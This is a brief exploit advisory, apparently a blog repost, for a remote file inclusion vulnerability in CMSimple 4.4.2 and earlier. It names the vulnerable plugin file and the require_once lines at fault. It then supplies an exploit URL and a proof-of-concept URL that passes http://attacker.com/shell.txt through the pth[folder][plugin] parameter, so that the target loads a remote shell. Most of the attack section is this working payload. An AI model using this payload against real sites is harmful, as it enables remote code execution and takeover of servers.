LFI to RCE via access_log injection

on
18

CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

on

[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system.

[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]

[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

Comments

Post a Comment